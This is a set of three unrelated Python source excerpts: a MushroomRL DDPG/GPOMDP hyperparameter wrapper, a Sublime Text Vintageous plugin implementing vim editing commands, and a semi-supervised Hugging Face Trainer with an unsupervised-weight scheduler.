critic_lr = Real(hp_name='critic_lr', obj_name='critic_lr_'+str(self.model.__name__),
current_actual_value=1e-3, range_of_values=[1e-5, 1e-3], to_mutate=True, seeder=self.seeder,
log_mode=self.log_mode, checkpoint_log_path=self.checkpoint_log_path, verbosity=self.verbosity)
critic_loss = Categorical(hp_name='loss', obj_name='loss_'+str(self.model.__name__),
current_actual_value=F.mse_loss)
batch_size = Integer(hp_name='batch_size', obj_name='batch_size_'+str(self.model.__name__),
current_actual_value=100, range_of_values=[8, 128], to_mutate=True, seeder=self.seeder,
log_mode=self.log_mode, checkpoint_log_path=self.checkpoint_log_path, verbosity=self.verbosity)
initial_replay_size = Integer(hp_name='initial_replay_size', current_actual_value=50000,
range_of_values=[1000, 10000], to_mutate=True, seeder=self.seeder,
log_mode=self.log_mode, obj_name='initial_replay_size_'+str(self.model.__name__))
max_replay_size = Integer(hp_name='max_replay_size', current_actual_value=1000000, range_of_values=[10000, 1000000],
to_mutate=True, seeder=self.seeder, log_mode=self.log_mode,
obj_name='max_replay_size_'+str(self.model.__name__))
tau = Real(hp_name='tau', current_actual_value=0.005, obj_name='tau_'+str(self.model.__name__))
policy_delay = Integer(hp_name='policy_delay', current_actual_value=1,
obj_name='policy_delay_'+str(self.model.__name__))
n_epochs = Integer(hp_name='n_epochs', current_actual_value=10, range_of_values=[1,50], to_mutate=True,
obj_name='n_epochs_'+str(self.model.__name__), seeder=self.seeder, log_mode=self.log_mode,
checkpoint_log_path=self.checkpoint_log_path, verbosity=self.verbosity)
n_steps = Integer(hp_name='n_steps', current_actual_value=None, obj_name='n_steps_'+str(self.model.__name__),
seeder=self.seeder, log_mode=self.log_mode, checkpoint_log_path=self.checkpoint_log_path,
verbosity=self.verbosity)
n_steps_per_fit = Integer(hp_name='n_steps_per_fit', current_actual_value=None, to_mutate=False,
obj_name='n_steps_per_fit_'+str(self.model.__name__), seeder=self.seeder,
log_mode=self.log_mode, checkpoint_log_path=self.checkpoint_log_path,
verbosity=self.verbosity)
n_episodes = Integer(hp_name='n_episodes', current_actual_value=500, range_of_values=[10,1000], to_mutate=True,
obj_name='n_episodes_'+str(self.model.__name__), seeder=self.seeder,
log_mode=self.log_mode, checkpoint_log_path=self.checkpoint_log_path,
verbosity=self.verbosity)
n_episodes_per_fit = Integer(hp_name='n_episodes_per_fit', current_actual_value=50, range_of_values=[1,1000],
to_mutate=True, obj_name='n_episodes_per_fit_'+str(self.model.__name__),
seeder=self.seeder, log_mode=self.log_mode,
checkpoint_log_path=self.checkpoint_log_path, verbosity=self.verbosity)
dict_of_params = {'policy_class': policy_class,
'sigma': sigma,
'theta': theta,
'dt': dt,
'actor_network': actor_network,
'actor_class': actor_class,
'actor_lr': actor_lr,
'critic_network': critic_network,
'critic_class': critic_class,
'critic_lr': critic_lr,
'loss': critic_loss,
'batch_size': batch_size,
'initial_replay_size': initial_replay_size,
'max_replay_size': max_replay_size,
'tau': tau,
'policy_delay': policy_delay,
'n_epochs': n_epochs,
'n_steps': n_steps,
'n_steps_per_fit': n_steps_per_fit,
'n_episodes': n_episodes,
'n_episodes_per_fit': n_episodes_per_fit
}
self.algo_params = dict_of_params
is_set_param_success = self.set_params(new_params=self.algo_params)
if(not is_set_param_success):
err_msg = 'There was an error setting the parameters of a'+'\''+str(self.__class__.__name__)+'\' object!'
self.logger.error(msg=err_msg)
self.fully_instantiated = False
self.is_learn_successful = False
return False
self.logger.info(msg='\''+str(self.__class__.__name__)+'\' object fully instantiated!')
self.fully_instantiated = True
return True
def model_specific_set_params(self, new_params, mdp_info, input_shape, output_shape, n_actions):
"""
Parameters
----------
new_params: These are the new parameters to set in the RL algorithm. It is a flat dictionary containing objects of Class
HyperParameter.
mdp_info: This is an object of Class mushroom_rl.environment.MDPInfo: it contains the action space, the observation space
and gamma and the horizon of the MDP.
input_shape: The shape of the observation space.
output_shape: The shape of the action space.
n_actions: If the space is Discrete this is the number of actions.
Returns
-------
tmp_structured_algo_params: A structured dictionary containing the parameters that are strictly part of the RL algorithm.
dict_to_add: A flat dictionary containing parameters needed in the method learn() that are not strictly part of the RL
algorithm, like the number of epochs and the number of episodes.
"""
critic_input_shape = Categorical(hp_name='critic_input_shape', obj_name='critic_input_shape_'+str(self.model.__name__),
current_actual_value=(input_shape.current_actual_value[0]+
self.info_MDP.action_space.shape[0],))
critic_output_shape = Categorical(hp_name='critic_output_shape', current_actual_value=(1,),
obj_name='critic_output_shape_'+str(self.model.__name__))
tmp_structured_algo_params = {'mdp_info': mdp_info,
'actor_params': {'input_shape': input_shape,
'n_actions': n_actions,
'output_shape': output_shape
},
'actor_optimizer': {'class': None, 'params': {'lr': None}},
'critic_params': {'input_shape': critic_input_shape,
'output_shape': critic_output_shape,
'optimizer': {'class': None, 'params': {'lr': None}}
}
}
#either np.ones(1) or np.ones(self.info_MDP.action_space.shape[0])
new_sigma = np.ones(1)*new_params['sigma'].current_actual_value
policy_params_dict = dict(sigma=new_sigma, theta=new_params['theta'].current_actual_value,
dt=new_params['dt'].current_actual_value)
policy_params = Categorical(hp_name='policy_params', current_actual_value=policy_params_dict,
obj_name='policy_params_'+str(self.model.__name__))
new_params.update({'policy_params': policy_params})
for tmp_key in list(new_params.keys()):
#i do not want to change mdp_info
if(tmp_key in ['policy_class', 'policy_params', 'batch_size', 'initial_replay_size', 'max_replay_size', 'tau',
'policy_delay']):
tmp_structured_algo_params.update({tmp_key: new_params[tmp_key]})
if(tmp_key == 'loss'):
tmp_structured_algo_params['critic_params'].update({tmp_key: new_params[tmp_key]})
if(tmp_key == 'critic_network'):
tmp_structured_algo_params['critic_params'].update({'network': new_params[tmp_key]})
if(tmp_key == 'critic_class'):
tmp_structured_algo_params['critic_params']['optimizer'].update({'class': new_params[tmp_key]})
if(tmp_key == 'critic_lr'):
tmp_structured_algo_params['critic_params']['optimizer']['params'].update({'lr': new_params[tmp_key]})
if(tmp_key == 'actor_network'):
tmp_structured_algo_params['actor_params'].update({'network': new_params[tmp_key]})
if(tmp_key == 'actor_class'):
tmp_structured_algo_params['actor_optimizer'].update({'class': new_params[tmp_key]})
if(tmp_key == 'actor_lr'):
tmp_structured_algo_params['actor_optimizer']['params'].update({'lr': new_params[tmp_key]})
structured_dict_of_values = self._select_current_actual_value_from_hp_classes(params_structured_dict=
tmp_structured_algo_params)
#i need to un-pack structured_dict_of_values for DDPG
self.algo_object = DDPG(**structured_dict_of_values)
#now that i have created the DDPG object i can resolve the conflict between the 'actor_class', 'actor_lr',
#'actor_network', 'critic_class', 'critic_lr' and 'critic_network'. To resolve it, i need to change their keys from
#generic 'class', 'lr' and 'network', that are needed for MushroomRL, to 'actor_class', 'actor_lr', 'actor_network',
#'critic_class', critic_lr' and 'critic_network':
tmp_structured_algo_params['critic_params']['critic_network'] = tmp_structured_algo_params['critic_params']['network']
del tmp_structured_algo_params['critic_params']['network']
new_val = tmp_structured_algo_params['critic_params']['optimizer']['class']
tmp_structured_algo_params['critic_params']['optimizer']['critic_class'] = new_val
del tmp_structured_algo_params['critic_params']['optimizer']['class']
new_val = tmp_structured_algo_params['critic_params']['optimizer']['params']['lr']
tmp_structured_algo_params['critic_params']['optimizer']['params']['critic_lr'] = new_val
del tmp_structured_algo_params['critic_params']['optimizer']['params']['lr']
new_val = tmp_structured_algo_params['actor_params']['network']
tmp_structured_algo_params['actor_params']['actor_network'] = new_val
del tmp_structured_algo_params['actor_params']['network']
tmp_structured_algo_params['actor_optimizer']['actor_class'] = tmp_structured_algo_params['actor_optimizer']['class']
del tmp_structured_algo_params['actor_optimizer']['class']
new_val = tmp_structured_algo_params['actor_optimizer']['params']['lr']
tmp_structured_algo_params['actor_optimizer']['params']['actor_lr'] = new_val
del tmp_structured_algo_params['actor_optimizer']['params']['lr']
#delete policy_params: this is constructed new each time here:
del tmp_structured_algo_params['policy_params']
#add n_epochs, n_steps, n_steps_per_fit, n_episodes, n_episodes_per_fit, sigma, theta, dt:
dict_to_add = {'n_epochs': new_params['n_epochs'],
'n_steps': new_params['n_steps'],
'n_steps_per_fit': new_params['n_steps_per_fit'],
'n_episodes': new_params['n_episodes'],
'n_episodes_per_fit': new_params['n_episodes_per_fit'],
'sigma': new_params['sigma'],
'theta': new_params['theta'],
'dt': new_params['dt']
}
return tmp_structured_algo_params, dict_to_add
class ModelGenerationMushroomOnlineGPOMDP(ModelGenerationMushroomOnline):
"""
This Class implements a specific online model generation algorithm: GPOMDP. This Class wraps the GPOMDP method implemented in
MushroomRL.
cf. https://github.com/MushroomRL/mushroom-rl/blob/dev/mushroom_rl/algorithms/policy_search/policy_gradient/gpomdp.py
This Class inherits from the Class ModelGenerationMushroomOnline.
"""
def __init__(self, eval_metric, obj_name, regressor_type='generic_regressor', seeder=2, algo_params=None, log_mode='console',
checkpoint_log_path=None, verbosity=3, n_jobs=1, job_type='process', deterministic_output_policy=True):
"""
Parameters
----------
algo_params: This is either None or a dictionary containing all the needed parameters.
The default is None.
If None then the following parameters will be used:
'policy': StateStdGaussianPolicy,
'approximator': LinearApproximator,
'input_shape': self.info_MDP.observation_space.shape,
'n_actions': None,
'output_shape': self.info_MDP.action_space.shape,
'optimizer': AdaptiveOptimizer,
'eps': 1e-2,
'n_epochs': 10,
'n_steps': None,
'n_steps_per_fit': None,
'n_episodes': 500,
'n_episodes_per_fit': 50
regressor_type: This is a string and it can either be: 'action_regressor', 'q_regressor' or 'generic_regressor'. This is
used to pick one of the 3 possible kind of regressor made available by MushroomRL.
Note that if you want to use a 'q_regressor' then the picked regressor must be able to perform
multi-target regression, as a single regressor is used for all actions.
The default is 'generic_regressor'.
deterministic_output_policy: If this is True then the output policy will be rendered deterministic else if False nothing
will be done. Note that the policy is made deterministic only at the end of the learn()
method.
Non-Parameters Members
----------------------
fully_instantiated: This is True if the block is fully instantiated, False otherwise. It is mainly used to make sure that
when we call the learn method the model generation blocks have been fully instantiated as they
undergo two stage initialisation being info_MDP unknown at the beginning of the pipeline.
info_MDP: This is a dictionary compliant with the parameters needed in input to all MushroomRL model generation
algorithms. It containts the observation space, the action space, the MDP horizon and the MDP gamma.
algo_object: This is the object containing the actual model generation algorithm.
algo_params_upon_instantiation: This a copy of the original value of algo_params, namely the value of
algo_params that the object got upon creation. This is needed for re-loading
objects.
model: This is used in set_params in the generic Class ModelGenerationMushroomOnline. With this member we avoid
re-writing for each Class inheriting from the Class ModelGenerationMushroomOnline the set_params method.
In this Class this member equals to GPOMDP, which is the Class of MushroomRL implementing GPOMDP.
core: This is used to contain the Core object of MushroomRL needed to run online RL algorithms.
The other parameters and non-parameters members are described in the Class Block.
"""
super().__init__(eval_metric=eval_metric, obj_name=obj_name, seeder=seeder, log_mode=log_mode,
checkpoint_log_path=checkpoint_log_path, verbosity=verbosity, n_jobs=n_jobs, job_type=job_type)
self.works_on_online_rl = True
self.works_on_offline_rl = False
self.works_on_box_action_space = True
self.works_on_discrete_action_space = False
self.works_on_box_observation_space = True
self.works_on_discrete_observation_space = True
self.regressor_type = | |
<filename>actions.py
"""Sublime Text commands performing vim actions.
If you are implementing a new action command, stick it here.
Action parsers belong instead in Vintageous/vi/actions.py.
"""
import sublime
import sublime_plugin
from Vintageous.state import IrreversibleTextCommand
from Vintageous.state import VintageState
from Vintageous.vi import utils
from Vintageous.vi import inputs
from Vintageous.vi.constants import _MODE_INTERNAL_NORMAL
from Vintageous.vi.constants import MODE_INSERT
from Vintageous.vi.constants import MODE_NORMAL
from Vintageous.vi.constants import MODE_VISUAL
from Vintageous.vi.constants import MODE_VISUAL_LINE
from Vintageous.vi.constants import MODE_SELECT
from Vintageous.vi.constants import regions_transformer
from Vintageous.vi.constants import regions_transformer_reversed
from Vintageous.vi.registers import REG_EXPRESSION
import re
class ViEditAtEol(sublime_plugin.TextCommand):
def run(self, edit, extend=False):
state = VintageState(self.view)
state.enter_insert_mode()
self.view.run_command('collapse_to_direction')
sels = list(self.view.sel())
self.view.sel().clear()
new_sels = []
for s in sels:
hard_eol = self.view.line(s.b).end()
new_sels.append(sublime.Region(hard_eol, hard_eol))
for s in new_sels:
self.view.sel().add(s)
class ViEditAfterCaret(sublime_plugin.TextCommand):
def run(self, edit, extend=False):
state = VintageState(self.view)
state.enter_insert_mode()
visual = self.view.has_non_empty_selection_region()
sels = list(self.view.sel())
self.view.sel().clear()
new_sels = []
for s in sels:
if visual:
new_sels.append(sublime.Region(s.end(), s.end()))
else:
if not utils.is_at_eol(self.view, s):
new_sels.append(sublime.Region(s.end() + 1, s.end() + 1))
else:
new_sels.append(sublime.Region(s.end(), s.end()))
for s in new_sels:
self.view.sel().add(s)
class _vi_big_i(sublime_plugin.TextCommand):
def run(self, edit, extend=False):
def f(view, s):
line = view.line(s.b)
pt = utils.next_non_white_space_char(view, line.a)
return sublime.Region(pt, pt)
state = VintageState(self.view)
state.enter_insert_mode()
regions_transformer(self.view, f)
class ViPaste(sublime_plugin.TextCommand):
def run(self, edit, register=None, count=1):
state = VintageState(self.view)
register = register or '"'
fragments = state.registers[register]
if not fragments:
print("Vintageous: Nothing in register \".")
return
sels = list(self.view.sel())
# If we have the same number of pastes and selections, map 1:1. Otherwise paste paste[0]
# to all target selections.
if len(sels) == len(fragments):
sel_to_frag_mapped = zip(sels, fragments)
else:
sel_to_frag_mapped = zip(sels, [fragments[0],] * len(sels))
# FIXME: Fix this mess. Separate linewise from charwise pasting.
pasting_linewise = True
offset = 0
paste_locations = []
for selection, fragment in reversed(list(sel_to_frag_mapped)):
fragment = self.prepare_fragment(fragment)
if fragment.startswith('\n'):
# Pasting linewise...
# If pasting at EOL or BOL, make sure we paste before the newline character.
if (utils.is_at_eol(self.view, selection) or
utils.is_at_bol(self.view, selection)):
l = self.paste_all(edit, selection,
self.view.line(selection.b).b,
fragment,
count)
paste_locations.append(l)
else:
l = self.paste_all(edit, selection,
self.view.line(selection.b - 1).b,
fragment,
count)
paste_locations.append(l)
else:
pasting_linewise = False
# Pasting charwise...
# If pasting at EOL, make sure we don't paste after the newline character.
if self.view.substr(selection.b) == '\n':
l = self.paste_all(edit, selection, selection.b + offset,
fragment, count)
paste_locations.append(l)
else:
l = self.paste_all(edit, selection, selection.b + offset + 1,
fragment, count)
paste_locations.append(l)
offset += len(fragment) * count
if pasting_linewise:
self.reset_carets_linewise()
else:
self.reset_carets_charwise(paste_locations, len(fragment))
def reset_carets_charwise(self, paste_locations, paste_len):
# FIXME: Won't work for multiple jagged pastes...
b_pts = [s.b for s in list(self.view.sel())]
if len(b_pts) > 1:
self.view.sel().clear()
self.view.sel().add_all([sublime.Region(ploc + paste_len - 1,
ploc + paste_len - 1)
for ploc in paste_locations])
else:
self.view.sel().clear()
self.view.sel().add(sublime.Region(paste_locations[0] + paste_len - 1,
paste_locations[0] + paste_len - 1))
def reset_carets_linewise(self):
# FIXME: Won't work well for visual selections...
# FIXME: This might not work for cmdline paste command (the target row isn't necessarily
# the next one.
state = VintageState(self.view)
if state.mode == MODE_VISUAL_LINE:
self.view.run_command('collapse_to_a')
else:
# After pasting linewise, we should move the caret one line down.
b_pts = [s.b for s in list(self.view.sel())]
new_rows = [self.view.rowcol(b)[0] + 1 for b in b_pts]
row_starts = [self.view.text_point(r, 0) for r in new_rows]
self.view.sel().clear()
self.view.sel().add_all([sublime.Region(pt, pt) for pt in row_starts])
def prepare_fragment(self, text):
if text.endswith('\n') and text != '\n':
text = '\n' + text[0:-1]
return text
# TODO: Improve this signature.
def paste_all(self, edit, sel, at, text, count):
state = VintageState(self.view)
if state.mode not in (MODE_VISUAL, MODE_VISUAL_LINE):
# TODO: generate string first, then insert?
# Make sure we can paste at EOF.
at = at if at <= self.view.size() else self.view.size()
for x in range(count):
self.view.insert(edit, at, text)
# Return position at which we have just pasted.
return at
else:
if text.startswith('\n'):
text = text * count
if not text.endswith('\n'):
text = text + '\n'
else:
text = text * count
if state.mode == MODE_VISUAL_LINE:
if text.startswith('\n'):
text = text[1:]
self.view.replace(edit, sel, text)
# Return position at which we have just pasted.
return sel.a
class ViPasteBefore(sublime_plugin.TextCommand):
def run(self, edit, register=None, count=1):
state = VintageState(self.view)
if register:
fragments = state.registers[register]
else:
# TODO: There should be a simpler way of getting the unnamed register's content.
fragments = state.registers['"']
sels = list(self.view.sel())
if len(sels) == len(fragments):
sel_frag = zip(sels, fragments)
else:
sel_frag = zip(sels, [fragments[0],] * len(sels))
offset = 0
for s, text in sel_frag:
if text.endswith('\n'):
if utils.is_at_eol(self.view, s) or utils.is_at_bol(self.view, s):
self.paste_all(edit, s, self.view.line(s.b).a, text, count)
else:
self.paste_all(edit, s, self.view.line(s.b - 1).a, text, count)
else:
self.paste_all(edit, s, s.b + offset, text, count)
offset += len(text) * count
def paste_all(self, edit, sel, at, text, count):
# for x in range(count):
# self.view.insert(edit, at, text)
state = VintageState(self.view)
if state.mode not in (MODE_VISUAL, MODE_VISUAL_LINE):
for x in range(count):
self.view.insert(edit, at, text)
else:
if text.endswith('\n'):
text = text * count
if not text.startswith('\n'):
text = '\n' + text
else:
text = text * count
self.view.replace(edit, sel, text)
class ViEnterNormalMode(sublime_plugin.TextCommand):
def run(self, edit):
state = VintageState(self.view)
if state.mode == MODE_VISUAL:
state.store_visual_selections()
# When returning to normal mode from select mode, we want to keep the non-Vintageous
# selections just created unless it's the last one.
if not (state.mode == MODE_SELECT and len(self.view.sel()) > 1):
self.view.run_command('collapse_to_direction')
self.view.run_command('dont_stay_on_eol_backward')
state.enter_normal_mode()
class ViEnterNormalModeFromInsertMode(sublime_plugin.TextCommand):
def run(self, edit):
sels = list(self.view.sel())
self.view.sel().clear()
new_sels = []
for s in sels:
if s.a <= s.b:
if (self.view.line(s.a).a != s.a):
new_sels.append(sublime.Region(s.a - 1, s.a - 1))
else:
new_sels.append(sublime.Region(s.a, s.a))
else:
new_sels.append(s)
for s in new_sels:
self.view.sel().add(s)
state = VintageState(self.view)
state.enter_normal_mode()
self.view.window().run_command('hide_auto_complete')
class ViEnterInsertMode(sublime_plugin.TextCommand):
def run(self, edit):
state = VintageState(self.view)
state.enter_insert_mode()
self.view.run_command('collapse_to_direction')
class ViEnterVisualMode(sublime_plugin.TextCommand):
def run(self, edit):
state = VintageState(self.view)
state.enter_visual_mode()
self.view.run_command('extend_to_minimal_width')
class ViEnterVisualBlockMode(sublime_plugin.TextCommand):
def run(self, edit):
# Handling multiple visual blocks seems quite hard, so ensure we only have one.
first = list(self.view.sel())[0]
self.view.sel().clear()
self.view.sel().add(first)
state = VintageState(self.view)
state.enter_visual_block_mode()
self.view.run_command('extend_to_minimal_width')
class ViEnterSelectMode(sublime_plugin.TextCommand):
def run(self, edit):
state = VintageState(self.view)
state.enter_select_mode()
class ViEnterVisualLineMode(sublime_plugin.TextCommand):
def run(self, edit):
state = VintageState(self.view)
state.enter_visual_line_mode()
class ViEnterReplaceMode(sublime_plugin.TextCommand):
def run(self, edit):
state = VintageState(self.view)
state.enter_replace_mode()
self.view.run_command('collapse_to_direction')
state.reset()
class SetAction(IrreversibleTextCommand):
def __init__(self, view):
IrreversibleTextCommand.__init__(self, view)
def run(self, action):
state = VintageState(self.view)
state.action = action
state.eval()
class SetMotion(IrreversibleTextCommand):
def __init__(self, view):
IrreversibleTextCommand.__init__(self, view)
def run(self, motion):
state = VintageState(self.view)
state.motion = motion
state.eval()
class ViPushDigit(sublime_plugin.TextCommand):
def run(self, edit, digit):
state = VintageState(self.view)
if not (state.action or state.motion):
state.push_motion_digit(digit)
elif state.action:
state.push_action_digit(digit)
class ViReverseCaret(sublime_plugin.TextCommand):
def run(self, edit):
sels = list(self.view.sel())
self.view.sel().clear()
new_sels = []
for s in sels:
new_sels.append(sublime.Region(s.b, s.a))
for s in new_sels:
self.view.sel().add(s)
class ViEnterNormalInsertMode(sublime_plugin.TextCommand):
def run(self, edit):
state = VintageState(self.view)
state.enter_normal_insert_mode()
# FIXME: We can't repeat 5ifoo<esc>
self.view.run_command('mark_undo_groups_for_gluing')
# ...User types text...
class ViRunNormalInsertModeActions(sublime_plugin.TextCommand):
def run(self, edit):
state = VintageState(self.view)
# We've recorded what the user has typed into the buffer. Turn macro recording off.
self.view.run_command('glue_marked_undo_groups')
# FIXME: We can't repeat 5ifoo<esc> after we're done.
for i in range(state.count - 1):
self.view.run_command('repeat')
# Ensure the count will be deleted.
state.mode = MODE_NORMAL
# Delete the count now.
state.reset()
self.view.run_command('vi_enter_normal_mode_from_insert_mode')
class SetRegister(sublime_plugin.TextCommand):
def run(self, edit, character=None):
state = VintageState(self.view)
if character is None:
state.expecting_register = True
else:
if character not in (REG_EXPRESSION,):
state.register = character
state.expecting_register = False
else:
self.view.run_command('vi_expression_register')
class ViExpressionRegister(sublime_plugin.TextCommand):
def run(self, edit, insert=False, next_mode=None):
def on_done(s):
state = VintageState(self.view)
try:
rv = [str(eval(s, None, None)),]
if not insert:
# TODO: We need to sort out the values received and sent to registers. When pasting,
# we assume a list... This should be encapsulated in Registers.
state.registers[REG_EXPRESSION] = rv
else:
self.view.run_command('insert_snippet', {'contents': str(rv[0])})
state.reset()
except:
sublime.status_message("Vintageous: Invalid expression.")
on_cancel()
def on_cancel():
state = VintageState(self.view)
state.reset()
self.view.window().show_input_panel('', '', on_done, None, on_cancel)
class _vi_m(sublime_plugin.TextCommand):
def run(self, edit, character=None):
state = VintageState(self.view)
state.marks.add(character, self.view)
class _vi_quote(sublime_plugin.TextCommand):
def run(self, edit, mode=None, character=None, extend=False):
def f(view, s):
if mode == MODE_VISUAL:
if s.a <= s.b:
if address.b < s.b:
return sublime.Region(s.a + 1, address.b)
else:
return sublime.Region(s.a, address.b)
else:
return sublime.Region(s.a + 1, address.b)
elif mode == MODE_NORMAL:
return address
elif mode == _MODE_INTERNAL_NORMAL:
return sublime.Region(s.a, address.b)
return s
state = VintageState(self.view)
address = state.marks.get_as_encoded_address(character)
if address is None:
return
if isinstance(address, str):
if not address.startswith('<command'):
self.view.window().open_file(address, sublime.ENCODED_POSITION)
else:
# We get a command in this form: <command _vi_double_quote>
self.view.run_command(address.split(' ')[1][:-1])
return
# This is a motion in a composite command.
| |
import torch
from torch.utils.data.dataloader import DataLoader
from torch.utils.data.sampler import RandomSampler, SequentialSampler
from transformers import Trainer
from .dataset_utils import SimpleDataset, extract_keys
import gc
import inspect
import datasets
from torch.optim.lr_scheduler import MultiplicativeLR
from copy import deepcopy
from typing import Optional
from torch.optim import Optimizer
from transformers.trainer_callback import TrainerState
from transformers.trainer_pt_utils import nested_detach
def get_linear_schedule_with_minlr(optimizer: Optimizer, num_warmup_steps: int,
num_training_steps: int, last_epoch: int = -1, min_lr: int = 1e-07):
"""
Creates a scheduler with a learning rate that linearly decreases but saturates at min_lr value.
Args:
optimizer (:class:`~torch.optim.Optimizer`):
The optimizer for which to schedule the learning rate.
num_warmup_steps (:obj:`int`):
The number of steps for the warmup phase.
num_training_steps (:obj:`int`):
The total number of training steps.
num_cycles (:obj:`int`, `optional`, defaults to 1):
The number of hard restarts to use.
last_epoch (:obj:`int`, `optional`, defaults to -1):
The index of the last epoch when resuming training.
min_lr (:obj:`int`, `optional`, defaults to 1e-07):
The value of minimum learning rate where it should saturate.
Return:
:obj:`torch.optim.lr_scheduler.MultiplicativeLR` with the appropriate schedule.
"""
init_lr = optimizer.defaults['lr']
def lr_lambda(current_step: int):
steps_done = float(num_training_steps - current_step)
if current_step > 1:
mul_fac = steps_done / max(steps_done + 1, 1)
else:
mul_fac = steps_done / (num_training_steps)
if mul_fac * init_lr > min_lr:
return mul_fac
else:
return 1
return MultiplicativeLR(optimizer, lr_lambda, last_epoch)
class RemoveUnusedColumnMixing:
def _remove_unused_columns(self, dataset: "datasets.Dataset", description: Optional[str] = None):
"""
Simply replacing model.pretrained_model.forward and model.teacher.forward in the
case of MeanTeacher and NoisyStudent from model.forward in
~transformers.Trainer._remove_unused_columns.
"""
if not self.args.remove_unused_columns:
return
# Inspect model forward signature to keep only the arguments it accepts.
if self.model.type_ == 'MeanTeacher' or self.model.type_ == 'NoisyStudent':
signature = inspect.signature(self.model.teacher.forward)
else:
signature = inspect.signature(self.model.pretrained_model.forward)
signature_columns = list(signature.parameters.keys())
# Labels may be named label or label_ids, the default data collator handles that.
signature_columns += ["label", "label_ids"]
columns = [k for k in signature_columns if k in dataset.column_names]
dataset.set_format(type=dataset.format["type"], columns=columns)
class UWScheduler:
"""
Unsupervised weights scheduler for changing the unsupervised weight
of the semi supervised learning models. Also contains methods any
other kinds variables updates required by the models. For example,
PiModel, TemporalEnsembling model, and Mean Teacher. In this implementation,
it's based on the composition with learning scheduler from pytorch and it
works best ~transformers.Trainer without having to rewrite train method.
# TODO: cleaner version with the rewritten Trainer.train method.
Args:
lr_scheduler (:obj:`torch.optim.lr_scheduler`): Learning scheduler object.
trainer (:obj:`~TrainerWithUWScheduler`): Trainer object.
unsup_start_epochs (:obj:`int`): value of epoch at which the unsupervised
weights should start updating.
max_w (:obj:`float`): maximum value of weight that the unsup_weight from model
could reach.
update_teacher_steps (:obj:`int`): useful for MeanTeacher, sets the interval after
which teacher variables should be updated.
w_ramprate (:obj:`float`): linear rate at which the unsupervised weight would be
increased from the initial value.
update_weights_steps (:obj:`int`): interval steps after which unsupervised weight
would be updated by the w_ramprate.
Class attributes:
-**step_in_epochs**: Number of steps (batch passes) in an epoch.
-**local_step**: keeps track of the times unsupervised weight has been changed.
"""
def __init__(self, lr_scheduler, trainer, unsup_start_epochs=0, max_w=1,
update_teacher_steps=False, w_ramprate=1, update_weights_steps=1):
self.trainer = trainer
self.lr_scheduler = lr_scheduler
self.local_step = 0
self.max_w = max_w
self.unsup_start_epochs = unsup_start_epochs
self.update_weights_steps = update_weights_steps
self.w_ramprate = w_ramprate
self.steps_in_epoch = len(self.trainer.train_dataset) // self.trainer.args.train_batch_size
self.update_teacher_steps = update_teacher_steps if update_teacher_steps else self.steps_in_epoch
def step(self):
"""
Implementation of composition of the pytorch learning rate scheduler step function
with schedule of unsupervised weights. Also implements updating the memory logits
for TemporalEnsembleModel and updating teacher variables for MeanTeacher model.
"""
self.lr_scheduler.step()
if self.trainer.state.epoch > self.unsup_start_epochs and self.is_true(self.update_weights_steps):
self.trainer.model.unsup_weight = min(self.max_w,
self.w_ramprate
* (self.local_step - self.unsup_start_epochs))
if self.trainer.model.type_ == "TemporalEnsembleModel" and self.is_true(self.steps_in_epoch):
self.trainer.model.update_memory_logits(int(self.trainer.state.epoch + 1))
if self.trainer.model.type_ == "MeanTeacher" and self.is_true(self.update_teacher_steps):
self.trainer.model.update_teacher_variables()
self.local_step += 1
def is_true(self, value):
"""
A simple checker function to if it is time to update things depending on the value of value.
"""
return (self.trainer.state.global_step and (self.trainer.state.global_step + 1) % value == 0)
def __getattr__(self, name):
"""
Needed for the calls from ~transformers.Trainer.train() method.
"""
return getattr(self.lr_scheduler, name)
class TrainerWithUWScheduler(RemoveUnusedColumnMixing, Trainer):
"""
Subclass of ~transformers.Trainer with minimal code change and integration
with unsupervised weight scheduler.
Args:
kwargs_uw: dictionary of arguments to be used by UWScheduler.
kwargs: dictionary arguments for the ~transformers.Trainer, of dataset used
by the trainer and could also include arguments of UWScheduler.
Note: dataset for training can be given to the trainer in two ways.
(i) dataset: In this case, it should the naming scheme of dataset_utils.modify_datasets.
(ii)train_dataset: Same naming scheme as used by ~transformers.Trainer.
"""
def __init__(self, kwargs_uw=None, *args, **kwargs):
self.kwargs_uw = kwargs_uw if kwargs_uw else extract_keys(UWScheduler, kwargs)
dataset = kwargs.pop('dataset', None)
if dataset:
kwargs['train_dataset'] = dataset["train"]
super().__init__(*args, **kwargs)
self.check_for_consistency()
def create_optimizer_and_scheduler(self, num_training_steps):
"""
Overriden ~transformers.Trainer.create_optimizer_and_scheduler with integration
with the UWScheduler to its Trainer.lr_scheduler object
"""
super().create_optimizer_and_scheduler(num_training_steps)
self.lr_scheduler = UWScheduler(self.lr_scheduler, self, **self.kwargs_uw)
def get_train_dataloader(self):
"""
Slightly changed ~transformers.Trainer.get_train_dataloader as models used in
Trainer do not allow for mixing of labeled and unlabeled data. So changing to
SequentialSampler instead of RandomSampler.
"""
train_sampler = SequentialSampler(self.train_dataset)
return DataLoader(
self.train_dataset,
batch_size=self.args.train_batch_size,
sampler=train_sampler,
collate_fn=self.data_collator,
drop_last=self.args.dataloader_drop_last,
num_workers=self.args.dataloader_num_workers,
)
def check_for_consistency(self):
"""
Checks if the labeled and unlabeled are present in the same minibatch, raises error if they are.
"""
labels = torch.tensor(self.train_dataset['label'])
batch_size = self.args.per_device_train_batch_size
for ind in range(len(labels) // batch_size):
min_batch = labels[ind * batch_size: (ind + 1) * batch_size]
if not (all(min_batch >= 0) or all(min_batch < 0)):
raise RuntimeError('Mixing of labeled and unlabeled examples is not allowed.')
class BaseForMMTrainer(RemoveUnusedColumnMixing, Trainer):
"""
Base class for all the mutimodel trainers. This class contains
the methods which are used by the Trainers which helps in training
the semi supervised way which have mutiple models .
"""
def get_dataloader(self, dataset, sequential=False):
"""
Slightly changed ~transformers.Trainer.get_train_dataloader
with the flexibility to change between sequential and RandomSampler.
"""
if sequential is True:
sampler = SequentialSampler(dataset)
else:
sampler = RandomSampler(dataset)
return DataLoader(
dataset,
batch_size=self.args.train_batch_size,
sampler=sampler,
collate_fn=self.data_collator,
drop_last=self.args.dataloader_drop_last,
num_workers=self.args.dataloader_num_workers,
)
def pre_train_init(self, num_training_steps):
"""
Collection of all the callback functions called before initializing
the training. See ~transformers.Trainer.train() for more details.
Args:
num_training_steps (:obj:`int`): total number of training which are
calculated by number of mini batches per epoch * number of epochs.
"""
self.state = TrainerState()
self.create_optimizer_and_scheduler(num_training_steps)
if self.use_min_lr_scheduler is not None:
self.lr_scheduler = get_linear_schedule_with_minlr(self.optimizer,
num_warmup_steps=self.args.warmup_steps,
